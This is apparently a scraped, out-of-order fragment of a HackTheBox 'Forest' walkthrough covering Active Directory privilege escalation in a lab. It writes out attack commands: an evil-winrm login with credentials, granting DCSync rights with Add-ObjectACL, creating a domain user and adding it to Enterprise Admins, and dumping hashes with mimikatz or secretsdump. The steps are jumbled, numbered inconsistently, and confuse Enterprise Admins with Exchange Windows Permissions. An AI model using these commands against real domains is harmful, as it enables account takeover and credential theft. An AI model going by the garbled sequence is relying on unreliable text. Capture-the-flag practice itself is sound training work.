cd C:\Users\Administrator\Desktop
type root.txt
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
$pass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb.local\john', $pass)
Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
Since svc-account is part of the Account Operators group, we can create a new user and escalate them to Admin.
1. Create a new user
net user pwned Password123! /add /domain
2. Add user to Enterprise Admins
net group "Enterprise Admins" pwned /add /domain
3. Dump Hashes (DCSync)
The results reveal a (Ticket-Granting Ticket) that can be used to gain access to the domain.
Get-DomainGroupMember -Identity "Exchange Windows Permissions"
Now, use mimikatz or impacket-secretsdump to perform DCSync:
10.10.10.161 (Replace with your spawned instance IP)
This is a classic privilege escalation chain. Our user has sufficient permissions to add a new user to the Exchange Windows Permissions group.
Forest Hackthebox Walkthrough Best